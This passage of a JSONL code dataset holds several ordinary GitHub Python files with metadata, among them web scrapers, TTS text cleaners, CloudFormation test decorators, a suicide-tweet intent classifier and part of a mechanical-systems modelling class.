{"api_name": "numpy.arange", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 278, "usage_type": "call"}]}
+{"seq_id": "70997525850", "text": "from bs4 import BeautifulSoup\r\n\r\nwith open(\"C:/Users/john_j_o'neill/DataRepresentation/week03-webScrapping/carviewer02.html\") as fp:\r\n soup = BeautifulSoup(fp,'html.parser')\r\n\r\n\r\n#print (soup.tr)\r\n#print all the rows under each tr\r\nrows= soup.findAll('tr')\r\nfor row in rows:\r\n# print(row)\r\n dataList =[]\r\n cols =row.findAll(\"td\")\r\n for col in cols:\r\n dataList.append(col.text)\r\n print(dataList)\r\n", "repo_name": "JohnONeillGMIT/dataRepresentation", "sub_path": "week03-webScrapping/PY03-readOurFile.py", "file_name": "PY03-readOurFile.py", "file_ext": "py", "file_size_in_byte": 421, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "bs4.BeautifulSoup", "line_number": 4, "usage_type": "call"}]}
+{"seq_id": "38302980635", "text": "#!/Users/ian/anaconda/bin/python\n\nimport json, glob, CoolProp\n\nfor fluid in glob.glob('../fluids/*.json'):\n with open(fluid, 'r') as fp:\n jj = json.load(fp)\n\n pL = jj['ANCILLARIES'].pop('pL')\n pV = jj['ANCILLARIES'].pop('pV')\n # Keep the one with the lower error\n if pL['max_abserror_percentage'] < pV['max_abserror_percentage']:\n pS = pL\n else:\n pS = pV\n\n pseudo_pure = jj['EOS'][0]['pseudo_pure']\n if pseudo_pure:\n print('-----------------PSEUDO (SKIPPING !!!) %s' % fluid)\n else:\n print(fluid)\n jj['ANCILLARIES']['pS'] = pS\n with open(fluid, 'w') as fp:\n json.dump(jj, fp)\n", "repo_name": "CoolProp/CoolProp", "sub_path": "dev/scripts/replace_ancillaries.py", "file_name": "replace_ancillaries.py", "file_ext": "py", "file_size_in_byte": 663, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 664, "dataset": "github-code", "pt": "32", "api": [{"api_name": "glob.glob", "line_number": 5, "usage_type": "call"}, {"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "25771865712", "text": "import re\nfrom unidecode import unidecode\nfrom pykakasi import kakasi\nfrom jamo import hangul_to_jamo\nfrom .numbers import normalize_numbers\n\n\n_kks = kakasi()\n_kks.setMode('H', 'a')\n_kks.setMode('K', 'a')\n_kks.setMode('J', 'a')\n_kks.setMode('E', 'a')\n_kks.setMode('s', True)\n_conv = _kks.getConverter()\n\n#White space\n_whitespace_re = re.compile(r'\\s+')\n\n#訳語処理のためのリスト\n_abbreviations = [(re.compile('\\\\b%s\\\\.' % x[0], re.IGNORECASE), x[1]) for x in [\n ('mrs', 'misess'),\n ('mr', 'mister'),\n ('dr', 'doctor'),\n ('st', 'saint'),\n ('co', 'company'),\n ('jr', 'junior'),\n ('maj', 'major'),\n ('gen', 'general'),\n ('drs', 'doctors'),\n ('rev', 'reverend'),\n ('lt', 'lieutenant'),\n ('hon', 'honorable'),\n ('sgt', 'sergeant'),\n ('capt', 'captain'),\n ('esq', 'esquire'),\n ('ltd', 'limited'),\n ('col', 'colonel'),\n ('ft', 'fort'),\n]]\n\ndef replace_abbreviations(text):\n for abbr, replacement in _abbreviations:\n text = re.sub(abbr, replacement, text)\n return text\n\ndef expand_numbers(text):\n return normalize_numbers(text)\n\ndef lowercase(text):\n return text.lower()\n\ndef collapse_whitespace(text):\n return re.sub(_whitespace_re, ' ', text)\n\ndef convert_to_ascii(text):\n return unidecode(text)\n\ndef english_cleaners(text):\n text = convert_to_ascii(text)\n text = lowercase(text)\n text = expand_numbers(text)\n text = replace_abbreviations(text)\n text = collapse_whitespace(text)\n return text\n\ndef japanese_cleaners(text):\n text = _conv.do(text)\n text = lowercase(text)\n text = expand_numbers(text)\n text = collapse_whitespace(text)\n return text\n\ndef korean_cleaners(text):\n text = ''.join(list(hangul_to_jamo(text)))\n return text\n\ndef transliteration_cleaners(text):\n text = convert_to_ascii(text)\n text = lowercase(text)\n text = collapse_whitespace(text)\n return text", "repo_name": "kgy94329/Tacotorn", "sub_path": "Tacotron/text/text_cleaner.py", "file_name": "text_cleaner.py", "file_ext": "py", "file_size_in_byte": 1866, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pykakasi.kakasi", "line_number": 8, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 17, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 20, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 20, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 43, "usage_type": "call"}, {"api_name": "numbers.normalize_numbers", "line_number": 47, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 53, "usage_type": "call"}, {"api_name": "unidecode.unidecode", "line_number": 56, "usage_type": "call"}, {"api_name": "jamo.hangul_to_jamo", "line_number": 74, "usage_type": "call"}]}
+{"seq_id": "73819110812", "text": "import os\nimport requests\nfrom bs4 import BeautifulSoup\n\nresource_path = r'./res_gossiping'\nif not os.path.exists(resource_path):\n os.mkdir(resource_path)\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'\n}\nss = requests.session()\nss.cookies['over18'] = '1'\n\nurl = 'https://www.ptt.cc/bbs/Gossiping/index.html'\n\nn = 30\nfor i in range(0, n):\n res = ss.get(url, headers=headers)\n soup = BeautifulSoup(res.text, 'html.parser')\n article_title_html = soup.select('div[class=\"title\"]')\n\n for each_article in article_title_html:\n try:\n print(each_article.a.text)\n print('https://www.ptt.cc' + each_article.a['href'])\n\n article_url = 'https://www.ptt.cc' + each_article.a['href']\n article_text = each_article.a.text\n article_res = ss.get(article_url, headers=headers)\n article_soup = BeautifulSoup(article_res.text, 'html.parser')\n\n push_up = 0\n push_down = 0\n score = 0\n author = ''\n title = ''\n datetime = ''\n article_content = article_soup.select('div#main-content')[0].text.split(\n '--'\n )[0]\n push_info_list = article_soup.select('div[class=\"push\"] span')\n for info in push_info_list:\n if '推' in info.text:\n push_up += 1\n if '噓' in info.text:\n push_down += 1\n article_info_list = article_soup.select(\n 'div[class=\"article-metaline\"] span'\n )\n for n, info in enumerate(article_info_list):\n if (n + 1) % 6 == 2:\n author = info.text\n if (n + 1) % 6 == 4:\n title = info.text\n if (n + 1) % 6 == 0:\n datetime = info.text\n score = push_up - push_down\n article_content += '\\n---split---\\n'\n article_content += '推: %s\\n' % (push_up)\n article_content += '噓: %s\\n' % (push_down)\n article_content += '分數: %s\\n' % (score)\n article_content += '作者: %s\\n' % (author)\n article_content += '標題: %s\\n' % (title)\n article_content += '時間: %s\\n' % (datetime)\n try:\n new_article_text = article_text\n for iw in '[\\/:*?\"<>|]':\n new_article_text = new_article_text.replace(iw, '_')\n with open(\n r'%s/%s.txt' % (resource_path, new_article_text),\n 'w',\n encoding='utf-8',\n ) as w:\n w.write(article_content)\n print()\n except FileNotFoundError as e:\n print('==========')\n print(article_url)\n print(e.args)\n print('==========')\n except OSError as e:\n print('==========')\n print(article_url)\n print(e.args)\n print('==========')\n\n except AttributeError as e:\n print('==========')\n print(each_article)\n print(e.args)\n print('==========')\n\n url = (\n 'https://www.ptt.cc'\n + soup.select('div[class=\"btn-group btn-group-paging\"]')[0].select('a')[1][\n 'href'\n ]\n )\n", "repo_name": "uuboyscy/course-PyETL", "sub_path": "part02_pttArticleWithCookie/05_pttGossipingWithCookies.py", "file_name": "05_pttGossipingWithCookies.py", "file_ext": "py", "file_size_in_byte": 3483, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.path.exists", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.session", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 20, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "23036012057", "text": "from functools import wraps\nfrom inspect import Parameter, signature\n\nimport pytest\n\nfrom rpdk.core.contract.interface import HandlerErrorCode\n\n\ndef _rebind(decorator, func, *args, **kwargs):\n \"\"\"Helper function to construct decorated arguments\n\n This works only with positional and likely positional arguments\n strongly keyword arguments are in **kwargs. It constructs kwargs'\n from positional values\n \"\"\"\n parameters = signature(func).parameters.values()\n decorated_parameters = set(signature(decorator).parameters.keys())\n\n positional_kwargs = dict(\n zip(\n [\n parameter.name\n for parameter in parameters\n if parameter.kind\n in (Parameter.POSITIONAL_ONLY, Parameter.POSITIONAL_OR_KEYWORD)\n and parameter.name not in kwargs\n ],\n args,\n )\n )\n return {k: kwargs.get(k) or positional_kwargs[k] for k in decorated_parameters}\n\n\ndef decorate(after=True):\n \"\"\"Helper function to construct decorator from a simple function\n\n arg: after means that decorated check should be run after the\n target function\n\n This is a 'decorate' meta function that wraps new decorator around\n target function and merges decorated arguments with target arguments\n convention: each new decorator should have a 'response' argument,\n which is an output of a target function\n \"\"\"\n\n def inner_decorator(decorator: object):\n def new_decorator(func: object):\n @wraps(func)\n def function(*args, **kwargs):\n response_arg = {}\n if after: # running function before the decorated check\n response = func(*args, **kwargs) # calling target function\n response_arg = {\"response\": response}\n\n kvargs = _rebind(decorator, func, *args, **{**kwargs, **response_arg})\n decorated_sig = signature(decorator)\n bound_arguments = decorated_sig.bind(**kvargs)\n decorator(\n *bound_arguments.args, **bound_arguments.kwargs\n ) # calling a decorated function to execute check\n\n # this allows to make a pre-execution check\n # e.g. 
if skip function\n if not after: # running function after the decorated check\n response = func(*args, **kwargs) # calling target function\n return response\n\n return function\n\n return new_decorator\n\n return inner_decorator\n\n\n@decorate()\ndef response_does_not_contain_write_only_properties(resource_client, response):\n resource_client.assert_write_only_property_does_not_exist(response[\"resourceModel\"])\n\n\n@decorate()\ndef response_contains_resource_model_equal_updated_model(\n response, current_resource_model, update_resource_model\n):\n assert response[\"resourceModel\"] == {\n **current_resource_model,\n **update_resource_model,\n }, \"All properties specified in the update request MUST be present in the \\\n model returned, and they MUST match exactly, with the exception of \\\n properties defined as writeOnlyProperties in the resource schema\"\n\n\n@decorate()\ndef response_contains_primary_identifier(resource_client, response):\n resource_client.assert_primary_identifier(\n resource_client.primary_identifier_paths, response[\"resourceModel\"]\n )\n\n\n@decorate()\ndef response_contains_unchanged_primary_identifier(\n resource_client, response, current_resource_model\n):\n assert resource_client.is_primary_identifier_equal(\n resource_client.primary_identifier_paths,\n current_resource_model,\n response[\"resourceModel\"],\n ), \"PrimaryIdentifier returned in every progress event must match \\\n the primaryIdentifier passed into the request\"\n\n\n@decorate(after=False)\ndef skip_not_writable_identifier(resource_client):\n if not resource_client.has_only_writable_identifiers():\n pytest.skip(\"No writable identifiers. Skipping test.\")\n\n\ndef failed_event(error_code, msg=\"\"):\n def decorator_wrapper(func: object):\n @wraps(func)\n def wrapper(*args, **kwargs):\n response_error = func(*args, **kwargs)\n if response_error is not None:\n if isinstance(error_code, HandlerErrorCode):\n error_code_tuple = (error_code,)\n assert response_error in error_code_tuple, msg\n return response_error\n\n return wrapper\n\n return decorator_wrapper\n", "repo_name": "inyamkacg/cloudformation-CLI", "sub_path": "src/rpdk/core/contract/suite/contract_asserts.py", "file_name": "contract_asserts.py", "file_ext": "py", "file_size_in_byte": 4562, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "inspect.signature", "line_number": 16, "usage_type": "call"}, {"api_name": "inspect.signature", "line_number": 17, "usage_type": "call"}, {"api_name": "inspect.Parameter.POSITIONAL_ONLY", "line_number": 25, "usage_type": "attribute"}, {"api_name": "inspect.Parameter", "line_number": 25, "usage_type": "name"}, {"api_name": "inspect.Parameter.POSITIONAL_OR_KEYWORD", "line_number": 25, "usage_type": "attribute"}, {"api_name": "inspect.signature", "line_number": 56, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 48, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 114, "usage_type": "call"}, {"api_name": "rpdk.core.contract.interface.HandlerErrorCode", "line_number": 123, "usage_type": "argument"}, {"api_name": "functools.wraps", "line_number": 119, "usage_type": "call"}]}
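Stripped of the signature rebinding, decorate() boils down to "call the target, feed its return value into the check, pass the value through". A standalone reduction of that idea (names here are hypothetical, not part of the module):

from functools import wraps

def check_after(check):
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            response = func(*args, **kwargs)  # call the target function first
            check(response)                   # then run the check on its output
            return response
        return wrapper
    return decorator

@check_after(lambda response: print('checked:', response))
def create_handler():
    return {'status': 'SUCCESS'}

create_handler()  # prints the check, then returns the dict unchanged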
+{"seq_id": "38019597285", "text": "import logging\nfrom datetime import datetime\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n\nclass log:\n def __init__(self, f):\n self.f = f\n self.logger = logging.getLogger(f.__module__)\n\n def __call__(self, *args):\n self.logger.info(\n 'chat_id:[{}] user_name:[{}] enters:[{}]'.format(args[0].effective_chat.id, args[0].effective_user.username,\n self.f.__name__))\n return self.f(*args)\n\n\nclass logInline:\n def __init__(self, f):\n self._f = f\n\n def __call__(self, *args):\n chat_id = args[0].effective_chat.id\n chat_message = args[0].effective_message.text\n msg = \"chat_id: {} || function: {} || message: {}\".format(chat_id, self._f.__name__, chat_message)\n print(\"{} : {}\".format(datetime.today(), msg))\n return self._f(*args)\n", "repo_name": "itchybumDev/buffolio-bot", "sub_path": "logging_handler.py", "file_name": "logging_handler.py", "file_ext": "py", "file_size_in_byte": 957, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "logging.basicConfig", "line_number": 4, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 4, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "29864076804", "text": "import numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import LinearSVC\nfrom sklearn.datasets import make_classification\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom joblib import dump, load\nfrom gensim.models import KeyedVectors #borrar prueba\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import cross_val_predict\n\nfrom vectorizer_data import get_vector_tfidf, create_tf_idf, w2v_vec, words_to_vec\n\n\n# DIMENCION VECTOR\ndim_vec=100\n\n#kidssas\npath_save_movel=\"./modelo/\" #Directorio donde se guardan los modelos entranados\nurl_data_csv='./modelo/suicidio_notacion.csv'\nurl_sw='./modelo/stopwords.txt'\n\n#Stopwords\nf = open(url_sw) # Open file on read mode\nstopwords = f.read().split(\"\\n\") # Create a list containing all lines\nf.close() # Close file\n#stopwords= open(url_sw).readlines()\n#print(stopwords)\n# Elimina stopwords \ndef delete_sw(frase):\n\tsin=[word for word in frase.split() if word not in stopwords]\n\t#print('Stopwords')\n\tif len(sin)==0:\n\t\treturn frase\n\telse:\n \t\treturn ' '.join(sin)\n\n\n# Lee el archivo csv y carga las listas que seran usadas.\ndef load_data(data_csv=url_data_csv):\n\tdata_g = pd.read_csv(data_csv) # Convierte csv en formato pandas\n\tfrase_sw=[]\n\tfor i in list(data_g.tweet_clean):\n\t\tfrase_sw.append(delete_sw(i))\n\treturn frase_sw, list(data_g.suicidio)\n\n\n# Retorna un dataframe con la data seleccionada\ndef get_random_data():\n\ttexto, clase = load_data(url_data_csv)\n\t#print(texto) \n\tdata_select = pd.DataFrame({'text': texto,'clase': clase})\n\tprint(data_select.shape)\n\tbalanced = data_select.groupby('clase').apply(sampling_k_elements).reset_index(drop=True)\n\treturn balanced\n\n# Toma 'k' datos random del dataset\ndef sampling_k_elements(group, k=500): \n if len(group) < k:\n return group\n return group.sample(k)\n\n\n# Separa los datos, para el entrenamiento y las pruebas\ndef split_data(vectores, clases): \n\t# tipo_vec='tf-idf', 'w2v'\n\t#print('vec',len(vectores),len(list(balanced['text'])))\n\tX_train, X_test, y_train, y_test = train_test_split(vectores, clases, test_size=0.2, random_state=42)\n\treturn X_train, X_test, y_train, y_test\n\ndef split_data2(frases, clases): \n\tk_train, k_test, l_train, l_test = train_test_split(frases, clases, test_size=0.2, random_state=42)\n\tfor i,j in zip(k_test,l_test):\n\t\tprint(j,i)\n\t\n\n# Clasificador Suport Vector Machine sin Kernel\ndef SVM(X_train, X_test, y_train, y_test,tipo_vec): \n\t#X_train, X_test, y_train, y_test=split_data(tipo_vec)\n\tclf = LinearSVC(random_state=0, tol=1e-5)\n\tclf.fit(X_train, y_train) \n\tLinearSVC(C=1.0, class_weight=None, dual=True, fit_intercept=True,\n\t intercept_scaling=1, loss='squared_hinge', max_iter=1000,\n\t multi_class='ovr', penalty='l2', random_state=0, tol=1e-05, verbose=0)\n\t#scores = cross_val_score(clf, X_train, y_train, cv=5)\n\t#print(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\tpred = clf.predict(X_test)\n\tprint(tipo_vec+'_SVM',' Accuracy: ' +str(clf.score(X_test, y_test)))\n\n\tprint(confusion_matrix(pred, y_test))\n\tprint(classification_report(pred, y_test))\n\tdump(clf, path_save_movel+tipo_vec+'_SVM.joblib')\n\n\n# Clasificador Regresion Logistica (distribucion de probabilidades)\ndef RL(X_train, X_test, y_train, y_test, tipo_vec):\n\t#X_train, X_test, y_train, 
y_test=split_data(tipo_vec)\n\tprint(tipo_vec+'_RL')\n\tclf = LogisticRegression(random_state=0, solver='lbfgs', multi_class='multinomial').fit(X_train, y_train)\n\t#y_pre = cross_val_predict(clf, X_train, y_train, cv=5)\n\t#print(classification_report(y_train, y_pre))\n\t#scores = cross_val_score(clf, X_train, y_train, cv=5)\n\t#print(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\tpred = clf.predict(X_test)\n\tprint(tipo_vec+'_RL',' Accuracy: ' +str(clf.score(X_test, y_test)))\n\tprint(confusion_matrix(pred, y_test))\n\tprint(classification_report(pred, y_test))\n\tdump(clf, path_save_movel+tipo_vec+'_RL.joblib')\n\n\n# Carga el modelo del clasificador\ndef load_classifier(tipo_model):\n\tif tipo_model=='tf-idf':\n\t\treturn load(path_save_movel+'tf-idf_RL.joblib') \n\telif tipo_model=='w2v':\n\t\treturn load(path_save_movel+'w2v_RL.joblib') \n\telse:\n\t\treturn 'Seleccione tipo de modelo'\n\n\n# Retorna una intencion de la frase, para respuesta del bot\ndef get_intent(frase,tipo_model='w2v',modelo_w2v=None):\n\t\n\tv=np.array([0]*dim_vec)#E\n\tmodelo_cl=load_classifier(tipo_model)\n\tif tipo_model=='w2v':\n\t\tfrase_vec=words_to_vec(frase,modelo_w2v)\n\t\treturn 4 if (frase_vec==v).all() else modelo_cl.predict(frase_vec.reshape(1,-1))[0]#E\n\telse:\n\t\treturn modelo_cl.predict(get_vector_tfidf(frase))[0]\n\n# Retorna una intencion de la frase para respuesta del bot, junto con la distribucion de probabilidades de pertenecer a una clase\ndef get_intent_prob(frase,tipo_model='w2v',modelo_w2v=None):\n\t\n\tmodelo_cl=load_classifier(tipo_model)\n\tif tipo_model=='w2v':\n\t\tv=np.array([0]*dim_vec) # DIMENCION\n\t\tfrase_vec, words_nw2v=words_to_vec(frase,modelo_w2v)\n\t\tprop=modelo_cl.predict_proba(frase_vec.reshape(1,-1))[0]\n\t\tdis_prob=[round(x*100,1) for x in prop]\n\t\treturn ([], words_nw2v) if (frase_vec==v).all() else (dis_prob, words_nw2v)\n\telse:\n\t\tfrase_vec, words_ntf=get_vector_tfidf(frase)# retorna el unico vector\n\t\tprint('SHAPE TF-IDF',frase_vec.shape)\n\t\tfrase_vec=frase_vec[0].reshape(1,-1)\n\t\tl,d=frase_vec.shape\n\t\tv=np.array([0]*d)\n\t\tprop=modelo_cl.predict_proba(frase_vec)[0]\n\t\tdis_prob=[round(x*100,1) for x in prop]\n\t\treturn ([], words_ntf) if (frase_vec==v).all() else (dis_prob, words_ntf)\n\n\n# Entrena modelos de clasificacion con los mismos datos\ndef training_models(model_w2v):\n\t#path_w2v=\"/root/w2v/SBW-vectors-300-min5.bin\" \n\tbalanced=get_random_data()#random y seleccion 'x' datos de cada clase\n\tvectores=[]\n\tvectores_tf=create_tf_idf(list(balanced['text']))\n\tvec_words=w2v_vec(list(balanced['text']),model_w2v)\n\t#test\n\tsplit_data2(list(balanced['text']), list(balanced['clase']))\n\tvectores_w2v=[a[0] for a in vec_words]\n\tX_train, X_test, y_train, y_test=split_data(vectores_tf, list(balanced['clase']))\n\tX_train2, X_test2, y_train2, y_test2=split_data(vectores_w2v, list(balanced['clase']))\n\tprint('Entrenando Modelos...')\n\tSVM(X_train, X_test, y_train, y_test,'tf-idf')\n\tRL(X_train, X_test, y_train, y_test,'tf-idf')\n\tSVM(X_train2, X_test2, y_train2, y_test2,'w2v')\n\tRL(X_train2, X_test2, y_train2, y_test2,'w2v')\n\nif __name__== \"__main__\":\n\ttraining_models()\n\t#chat()\n", "repo_name": "kvvaldez/spanish_suicide", "sub_path": "Code/intent_classification.py", "file_name": "intent_classification.py", "file_ext": "py", "file_size_in_byte": 6452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pandas.read_csv", 
"line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 53, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 73, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 81, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 92, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 100, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 107, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 108, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 109, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 115, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 125, "usage_type": "call"}, {"api_name": "vectorizer_data.words_to_vec", "line_number": 128, "usage_type": "call"}, {"api_name": "vectorizer_data.get_vector_tfidf", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 138, "usage_type": "call"}, {"api_name": "vectorizer_data.words_to_vec", "line_number": 139, "usage_type": "call"}, {"api_name": "vectorizer_data.get_vector_tfidf", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 148, "usage_type": "call"}, {"api_name": "vectorizer_data.create_tf_idf", "line_number": 159, "usage_type": "call"}, {"api_name": "vectorizer_data.w2v_vec", "line_number": 160, "usage_type": "call"}]}
+{"seq_id": "32202633600", "text": "\"\"\"\nWrite a function that takes directory path, a file extension and an optional tokenizer.\nIt will count lines in all files with that extension if there are no tokenizer.\nIf a the tokenizer is not none, it will count tokens.\n\n# For dir with two files from hw1.py:\n# >>> universal_file_counter(test_dir, \"txt\")\n# 6\n# >>> universal_file_counter(test_dir, \"txt\", str.split)\n# 6\n\n\"\"\"\nimport os\nfrom pathlib import Path\nfrom typing import Callable, Optional\n\n\ndef tokenizer_processing(line, tokenizer):\n if tokenizer is None:\n return 1\n else:\n if type(tokenizer) is list:\n return sum([len(line.split(entry[0])) for entry in tokenizer])\n else:\n return len(tokenizer(line))\n\n\ndef universal_file_counter(\n dir_path: Path, file_extension: str, tokenizer: Optional[Callable] = None\n) -> int:\n counter = 0\n for file in os.listdir(dir_path):\n file_path = os.path.join(dir_path, file)\n if file.endswith(file_extension):\n with open(file_path) as fh:\n for line in fh:\n counter += tokenizer_processing(line, tokenizer)\n return counter\n", "repo_name": "Nadya7n/epam_homework_2021", "sub_path": "homework9/hw3.py", "file_name": "hw3.py", "file_ext": "py", "file_size_in_byte": 1140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pathlib.Path", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 29, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}]}
+{"seq_id": "15918710597", "text": "from sympy import (Symbol, symbols, Matrix, sin, cos, asin, diff, sqrt, S,\n diag, Eq, hessian, Function, flatten, Tuple, im, pi, latex,\n dsolve, solve, fraction, factorial, Subs, Number, oo, Abs,\n N, solveset)\n\nfrom sympy.physics.mechanics import dynamicsymbols, ReferenceFrame, Point\nfrom sympy.physics.vector import vpprint, vlatex\nfrom ...dynamics import LagrangesDynamicSystem, HarmonicOscillator, mech_comp\n\nfrom ..elements import MaterialPoint, Spring, GravitationalForce, Disk, RigidBody2D, Damper, PID, Excitation, Force, base_frame, base_origin\nfrom ...continuous import ContinuousSystem, PlaneStressProblem\n\n\n\nimport base64\nimport random\nimport IPython as IP\nimport numpy as np\nimport inspect\n\nimport matplotlib.pyplot as plt\nfrom functools import cached_property, lru_cache\n\n\nREPORT_COMPONENTS_LIST = [\n mech_comp.TitlePageComponent,\n mech_comp.SchemeComponent,\n mech_comp.ExemplaryPictureComponent,\n mech_comp.KineticEnergyComponent,\n mech_comp.KineticEnergyDynPyCodeComponent,\n mech_comp.KineticEnergySymPyCodeComponent,\n mech_comp.PotentialEnergyComponent,\n mech_comp.PotentialEnergyDynPyCodeComponent,\n mech_comp.PotentialEnergySymPyCodeComponent,\n mech_comp.LagrangianComponent,\n mech_comp.GoverningEquationComponent,\n mech_comp.GoverningEquationDynpyCodeComponent,\n mech_comp.GoverningEquationSympyCodeComponent,\n mech_comp.FundamentalMatrixComponent,\n mech_comp.GeneralSolutionComponent,\n mech_comp.GeneralSolutionDynpyCodeComponent,\n mech_comp.GeneralSolutionSympyCodeComponent,\n mech_comp.SteadySolutionComponent,\n mech_comp.FreeVibrationFrequencyComponent\n ]\n\ndef plots_no():\n num = 0\n while True:\n yield num\n num += 1\n\n\n\nclass ComposedSystem(HarmonicOscillator):\n \"\"\"Base class for all systems\n\n \"\"\"\n _case_no = plots_no()\n \n scheme_name = 'damped_car_new.PNG'\n real_name = 'car_real.jpg'\n detail_scheme_name = 'sruba_pasowana.png'\n detail_real_name = 'buick_regal_3800.jpg'\n _default_args = ()\n #_default_folder_path = \"./dynpy/models/images/\"\n _path = None\n\n z = dynamicsymbols('z')\n\n m0 = Symbol('m_0', positive=True)\n k0 = Symbol('k_0', positive=True)\n F0 = Symbol('F_0', positive=True)\n Omega0 = Symbol('Omega_0', positive=True)\n ivar=Symbol('t')\n\n \n # @classmethod\n # def _scheme(cls):\n\n # path = cls._default_folder_path + cls.scheme_name\n\n # return path\n\n # @classmethod\n # def _real_example(cls):\n # path = cls._default_folder_path + cls.real_name\n\n # return path\n\n @classmethod\n def _detail_real(cls):\n path = cls._default_folder_path + cls.detail_real_name\n\n return path\n\n @classmethod\n def _detail_scheme(cls):\n path = cls._default_folder_path + cls.detail_scheme_name\n\n return path\n\n def _init_from_components(self, *args, system=None, **kwargs):\n\n if system is None:\n composed_system = self._elements_sum\n else:\n composed_system = system\n\n #print('CS',composed_system._components)\n super(HarmonicOscillator,self).__init__(None, system=composed_system)\n\n #print('self',self._components)\n if self._components is None:\n comps = {}\n else:\n comps = self._components\n\n self._components = {**comps, **self.components}\n\n def __init__(self,\n Lagrangian=None,\n m0=None,\n qs=None,\n forcelist=None,\n bodies=None,\n frame=None,\n hol_coneqs=None,\n nonhol_coneqs=None,\n label=None,\n ivar=None,\n evaluate=True,\n system=None,\n **kwargs):\n\n if ivar is not None: self.ivar = ivar\n if m0 is not None: self.m0 = m0\n\n if qs is not None:\n self.qs = qs\n 
else:\n self.qs = [self.z]\n\n\n self._init_from_components(system=system, **kwargs)\n\n @property\n def components(self):\n\n components = {}\n\n self._material_point = MaterialPoint(Symbol('ItIsWrongCode '), self.qs[0],\n self.qs)('Material Point')\n components['_material_point'] = self._material_point\n\n self._label = 'System seems to be wrong - method components is not overload'\n \n return components\n\n @property\n def elements(self):\n\n return {**super().components, **self.components}\n\n @classmethod\n def preview(cls, example=False):\n if example:\n path = cls._real_example()\n\n elif example == 'detail_scheme_name':\n path = cls._detail_scheme()\n elif example == 'detail_real_name':\n path = cls._detail_real()\n else:\n path = cls._scheme()\n print(path)\n with open(f\"{path}\", \"rb\") as image_file:\n encoded_string = base64.b64encode(image_file.read())\n image_file.close()\n\n return IP.display.Image(base64.b64decode(encoded_string))\n\n def _components_default_data(self,formatter=None):\n \n if formatter is None:\n formatter = lambda obj: 